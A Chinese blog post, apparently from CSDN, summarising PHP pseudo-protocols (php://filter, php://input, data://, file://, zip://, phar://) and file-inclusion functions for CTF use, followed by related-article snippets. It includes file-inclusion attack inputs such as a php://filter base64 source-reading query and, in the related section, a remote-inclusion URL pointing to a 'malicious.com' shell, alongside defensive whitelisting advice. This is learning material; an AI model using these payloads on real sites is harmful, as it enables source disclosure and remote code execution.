伪协议小总结

原创 已于 2023-03-26 16:15:56 修改 · 275 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #服务器 #开发语言

于 2023-03-26 16:04:40 首次发布
本文围绕PHP展开,介绍了PHP伪协议,如需开启allow_url_fopen的php://input等,以及data、file、zip、phar协议;还阐述了PHP常用函数,像include、require等函数的作用、使用位置、执行效率及返回值等内容。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一.

file:// — 访问本地文件系统
http:// — 访问 HTTP(s) 网址
ftp:// — 访问 FTP(s) URLs
php:// — 访问各个输入/输出流(I/O streams)
zlib:// — 压缩流
data:// — 数据(RFC 2397)
glob:// — 查找匹配的文件路径模式
phar:// — PHP 归档
ssh2:// — 安全外壳协议 2
rar:// — RAR
ogg:// — 音频流
expect:// — 处理交互式的流

1.php伪协议:访问各个输入输出流

需要开启allow_url_fopen的:php://input、php://stdin、php://memory和php://temp

不需要开启allow_wrl_fopen的:php://filter

在CTF中经常使用的是php://filter和php://input

php://filter用于读取源码,php://input用于执行php代码

php://input需要post请求提交数据

php://filter可以get提交?a=php://filter/read=convert.base64-encode/resource=xxx.php

php://filter:


php://filter是一种元封装器,是PHP中特有的协议流,设计用于数据流打开时的筛选过滤应用,作用是作为一个“中间流”来处理其他流。

php://filter目标使用以下的参数作为它路径的一部分。复合过滤链能够在一个路径上指定

名称
resource=<要过滤的数据流>指定了你要筛选过滤的数据流。必选     
read=<读链的筛选列表>可以设定一个或多个过滤器名称,以管道符分隔可选
write=<写链的筛选列表>可以设定一个或多个过滤器名称,以管道符分隔。可选
<;两个链的筛选列表>
任何没有以 read= 或 write= 作前缀 的筛选器列表会视情况应用于读或写链。


 

2.data伪协议

data://伪协议,是数据流封装器,和php://相似,都是利用了流的概念,将原本的include的文件流重定向到了用户可控制的输入流中,简单来说就是执行文件的包含方法包含了你的输入流,通过包含你输入的payload来实现目的。
格式:?file=data://text/plain,payload ?>

3.file协议

file://用于访问本地文件系统

用法:file:// [文件的绝对路径和文件名]

4.zip://

zip://绝对路径\需要解压缩的文件%23子文件名

5.phar://

类似zip,与zip协议不同的是zip协议为绝对路径,而phar协议为相对路径。

二.函数

1.include函数


可以放在PHP脚本的任意位置,一般放在流程控制的处理部分中。当PHP脚本执行到include指定引入的文件时,才将它包含并尝试执行。这种方式可以把程序执行时的流程进行简单化。当第二次遇到相同文件时,PHP还是会重新解释一次,include相对于require的执行效率下降很多,同时在引入文件中包含用户自定义函数时,PHP在解释过程中会发生函数重复定义问题。include载入成功后,返回1,失败则返回false。

2.require函数


require函数一般放在PHP脚本的最前面,PHP执行前就会先读入require指定引入的文件,包含并尝试执行引入的脚本文件。require的工作方式是提高PHP的执行效率,当它在同一个网页中解释过一次后,第二次便不会解释。但同样的,正因为它不会重复解释引入文件,所以当PHP中使用循环或条件语句来引入文件时,需要用到include。require载入成功返回1,失败无返回值。

3.include_once和require_once函数


分别与require / include作用相同,不同的是他们在执行到时会先检查目标内容是不是在之前已经导入过,如果导入过了,那么便不会再次重复引入其同样的内容。

4.highlight_file函数


highlight_file() 函数对文件进行语法高亮显示。

语法:highlight_file(filename,return) —— filename:必需。要进行高亮处理的 PHP 文件的路径。return:可选。如果设置 true,则本函数返回高亮处理的代码。

该函数通过使用 PHP 语法高亮程序中定义的颜色,输出或返回包含在 filename 中的代码的语法高亮版本。如果 return 参数被设置为 true,那么该函数会返回被高亮处理的代码,而不是输出它们。否则,若成功,则返回 true,失败则返回 false。

5.show_source函数


该函数是highlight_file函数的别名。

6.file_get_contents()

把整个文件读入一个字符串中。

该函数是用于把文件的内容读入到一个字符串中的首选方法。如果服务器操作系统支持,还会使用内存映射技术来增强性能。

语法
file_get_contents(path,include_path,context,start,max_length)

7.file函数

file() 函数把整个文件读入一个数组中。与 file_get_contents() 类似,不同的是 file() 将文件作为一个数组返回。数组中的每个单元都是文件中相应的一行,包括换行符在内。如果失败,则返回 false。

语法

file(path,include_path,context)

TLMOA
关注
【网络安全 | CTF】攻防世界 Web_php_include【php伪协议|data伪协议|file伪协议
等风来
05-22 1万+
PHP 语言中一个重要的文件包含机制,可以将一个 PHP 文件包含到另一个 PHP 脚本文件中。该机制通常用于代码复用和模块化开发,在不同的 PHP 文件之间实现函数和类等代码的共享。file 伪协议用于访问本地文件系统中的文件,可以在 web 页面中链接到本地文件,或者读取本地文件中的数据。PHP 伪协议是一种特殊的 URI 协议,可以绕过通常的协议限制,直接访问本地文件和执行 PHP 代码。函数,该函数返回当前工作目录的绝对路径。函数,该函数返回当前执行的 PHP 脚本所在位置的绝对路径。
PHP伪协议总结
ningwangh的博客
08-27 1032
File协议主要用于访问本地计算机中的文件,就如同在Windows资源管理器中打开文件一样。PHP封装协议在CTF蛮常见的,是经常会遇到的出题点,以下是这篇文章的总结,希望能够帮助到大家。
【每天学习一点新知识】文件包含常用之伪协议
RexHa的博客
02-06 3856
一些比较常用的php伪协议用法及部分演示过程
【文件包含中的伪协议
My笔记的博客
05-15 1827
php.ini 中的两个重要选项 PHP 中几个比较重要的伪协议php://input 协议还可以用来生成一句话木马,这里假设我们用的之前的直接包含的php代码: 这是一个文件上传的页面可以上传一个文件上去 上传后发现失败了,那就说明不是文件上传的题目,我们在url地址栏发现了一个op参数和一个key参数,我们用文件审查查看一下源代码 点开后,看到一个op的参数,看到这个好参数我们会想到可能存在文件包含,比如我们改成upload 就变成了上传文件的页面,这里我们可以猜到通过op的参数包含不同的文件
PHP常用伪协议
L1ni01
09-17 320
一.(file://协议) PHP.ini: file:// 协议在双off的情况下也可以正常使用; allow_url_fopen :off/on allow_url_include:off/on file:// 用于访问本地文件系统,在CTF中通常用来读取本地文件的且不受allow_url_fopen与allow_url_include的影响 file:// [文件的绝对路径和文件名] 例如 http://127.0.0.1/cmd.php?file=file://D:/soft/phpStudy/WW
fileclde解题流程
qq_65240014的博客
02-04 844
data://伪协议,是数据流封装器,和php://相似,都是利用了流的概念,将原本的include的文件流重定向到了用户可控制的输入流中,简单来说就是执行文件的包含方法包含了你的输入流,通过包含你输入的payload来实现目的。上面是对应源码的解读,对于file1,需要使用伪协议php://filter/read=convert.base64-encode/resource=来获取到flag文件的源码。输入,就可以得到base64加密过的flag了。解密就可以得到真正的flag。
PHP 伪协议大总结.docx
02-24
### PHP 伪协议详解 #### 一、概述 在探讨PHP伪协议之前,我们先来了解下何为“伪协议”。伪协议(pseudo-protocol)指的是由PHP内部实现的特定协议,它们允许开发者通过简单的字符串指定的方式访问各种不同的资源...
文件包含时涉及PHP伪协议总结
qq_43256965的博客
05-14 1701
在做CTF题的时候文件包含题出现多次使用伪协议,学习了下伪协议就顺便写个博客防止以后忘记PHP伪协议总结温故而知新,宁静以致远。
PHP伪协议学习总结
不想当脚本小子的脚本小子
12-01 596
今天工作中遇到了一个利于curl来伪装POST传参的方法(这里给大家一个思路,当你觉得利用get传参行不通的时候,不妨试试post传参),其中用到了php伪协议,我对这一块不太了解,只是在学习文件包含漏洞的时候用到了file://这种本地文件包含,在这里我打算系统的学习并且总结一下,也方便了自己日后复习。 首先,php伪协议有以下几种(我觉得很多东西是要记在脑子里的): file:// — 访问本地文件系统 http:// — 访问 HTTP(s) 网址 ftp:// — 访问 FTP(s...
【CTF Web安全】PHP弱类型与伪协议漏洞解析:CTF Web题型理论基础及绕过技巧总结
最新发布
05-13
内容概要:本文档主要介绍了CTF竞赛中Web题型的理论基础,涵盖PHP弱类型特性及其绕过技巧、常见PHP伪协议的应用场景及具体示例。PHP弱类型部分详细解释了“==”与“===”的区别,以及由此引发的各种绕过方法,如md5...
【攻防世界】ics-05(PHP伪协议+代码审计+Linux指令)
2302_79800344的博客
04-08 2005
它表示在执行替换时将替换字符串作为 PHP 代码进行评估和执行。修饰符在 PHP 中已经被废弃。
web安全——伪协议
热门推荐
永远相信美好的事情即将发生
02-06 1万+
伪协议常常用于文件包含漏洞之中。在php中能够造成文件包含的函数有include、require、include_once、require_once、highlight_file、show_source、file_get_contents、fopen、file、readfile 函数 1.include函数 可以放在PHP脚本的任意位置,一般放在流程控制的处理部分中。当PHP脚本执行到include指定引入的文件时,才将它包含并尝试执行。这种方式可以把程序执行时的流程进行简单化。当第二次遇到相同文件时,PH
PHP-伪协议
摘星怪sec的blog
04-25 8267
常用的伪协议有就可以利用使用文件包含函数包含文件时,文件中的代码会被执行,如果想要读取文件源码,可以使用对文件内容进行编码,编码后的文件内容不会被执行,而是展示在页面中,我们将页面中的内容使用解码,就可以获取文件的源码了。
文件包含支持的伪协议
qq_50673174的博客
05-15 9406
文件包含漏洞的补充。 主要是文件包含漏洞支持的伪协议
伪协议利用
一只web狗
06-23 1791
PHP伪协议PHP带有很多内置URL风格的封装协议,可用于类似fopen()、copy()、file_exists()和filesize()的文件系统函数。
文件包含中的伪协议
weixin_51693574的博客
12-23 2035
文件包含中的伪协议 1.利用前提 1.web 应用采用 include 等文件包含函数,并且需要包含的文件路径是通过用户传输参数的方式引入; 2.用户能够控制包含文件的参数,被包含的文件可被当前页面访问; 3.在使用文件包含漏洞时,必须要能知道其绝对路径(在包含文件处,查看其返回的错误的信息) 2.伪协议文件包含(伪协议后必须是文件绝对路径) 1.file:// 访问本地文件系统 2.http:// 访问 HTTPs 网址 3.ftp:// 访问 ftp URL 4.php://
zlib://封装协议
beyond__devil的博客
10-19 2271
支持的协议和封装协议->zlib:// zlib://封装协议,包含3个协议,正好对应的是 '压缩与归档扩展' 里的3个扩展:     zlib://(目前使用:compress.zlib://) - 对应 'zlib' 扩展     bzip2://(目前使用:compress.bzip2://) - 对应 'bzip2' 扩展     zip:// - 对应 'zip' 扩展
[php知识点]PHP伪协议
Landasika的博客
05-17 9344
目录 一、前言1、什么是PHP伪协议2、什么时候用PHP伪协议include和require函数include和include_once的区别(require与require_once的区别)highlight_file()和show_source()readfile和file_get_contents和filefile_put_contentsfopen二、PHP伪协议file://...
恶意 PHP 伪协议
04-03
### PHP 中与恶意伪协议相关的安全问题及防护方法 #### 背景介绍 PHP 支持多种伪协议 (pseudo-protocols),这些协议可以用于文件读取、网络请求以及其他功能。然而,如果开发者未对输入数据进行严格的验证和过滤,则可能导致严重的安全隐患,例如远程代码执行 (RCE) 或本地/远程文件包含 (LFI/RFI)[^4]。 常见的伪协议包括但不限于 `file://`、`php://input`、`phar://` 和 `data:` 协议。其中一些伪协议可能被攻击者利用来绕过安全机制或注入恶意代码。 --- #### 主要的安全风险 1. **远程文件包含 (Remote File Inclusion, RFI)** 如果应用程序允许通过 URL 动态加载外部资源,并且未对传入参数进行校验,攻击者可以通过指定恶意 URI 来引入远程脚本。例如: ```php include($_GET['page']); ``` 当用户传递如下参数时,可能导致远程文件包含漏洞: ``` ?page=http://malicious.com/shell.php ``` 2. **伪协议滥用** 某些伪协议可以直接访问敏感数据或执行命令。例如: - 使用 `php://filter` 可以对流应用过滤器并返回修改后的结果。 ```php file_get_contents('php://filter/read=convert.base64-encode/resource=config.php'); ``` 上述代码会将 `config.php` 文件的内容以 Base64 编码形式输出给攻击者[^5]。 - 利用 `zip://` 或 `phar://` 进行压缩包内的文件操作也可能成为潜在威胁。 3. **跨站点请求伪造 (CSRF)** 结合上述引用中的描述[^2],即使某些接口仅限于 POST 请求,但如果存在 CSRF 漏洞,攻击者仍可通过诱导用户点击链接等方式完成非法操作。 --- #### 防护措施 为了防止因伪协议引发的安全隐患,建议采取以下策略: 1. **禁用危险函数** 对于高危函数如 `include()`、`require()`、`fopen()` 等,在调用前需确保其路径来源于可信源。必要时可完全屏蔽特定伪协议支持: ```ini allow_url_fopen = Off allow_url_include = Off ``` 2. **白名单验证** 实施严格的输入校验逻辑,只接受预定义范围内的合法值作为动态载入模块的依据。比如限定页面跳转地址只能指向内部目录下的固定几个选项之一: ```php $allowed_pages = ['home', 'about', 'contact']; if (!in_array($_GET['page'], $allowed_pages)) { die('Invalid page request.'); } include($_GET['page'] . '.php'); ``` 3. **强制 HTTPS 加密通信** 根据 HSTS 头部配置指南[^3],设置合适的最大有效期 (`max-age`) 并覆盖所有子域 (`includeSubDomains`),从而减少中间人劫持的风险: ```apacheconf Header always set Strict-Transport-Security "max-age=31536000; includeSubDomains" ``` 4. **日志记录与监控** 启用详细的错误报告并将异常行为写入审计日志以便后续分析排查原因所在。同时定期审查服务器上的可疑活动迹象。 5. **框架级防御** 若项目依赖第三方库构建业务流程,则优先选用那些内置完善保护机制的产品版本号尽可能保持最新状态以免遭受已知缺陷影响。 --- ```php // 示例:如何安全地处理用户提供的URL参数 function safeInclude($paramName){ global $_GET; // 定义允许包含的文件列表 $whitelist = array( 'index', 'login', 'logout' ); // 获取并清理输入变量 $requestedFile = isset($_GET[$paramName])?trim(strip_tags($_GET[$paramName])):''; // 检查是否匹配白名单项 if(in_array($requestedFile,$whitelist)){ require_once "$requestedFile.php"; }else{ echo "Access denied."; } } safeInclude('module'); ``` --- #### 总结 通过对 PHP 应用程序实施全面细致的安全加固方案能够有效抵御基于伪协议发动的各种攻击手段。这不仅涉及技术层面的具体实现细节调整还需要建立健全管理制度保障整体环境处于可控范围内长期稳定运行下去。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值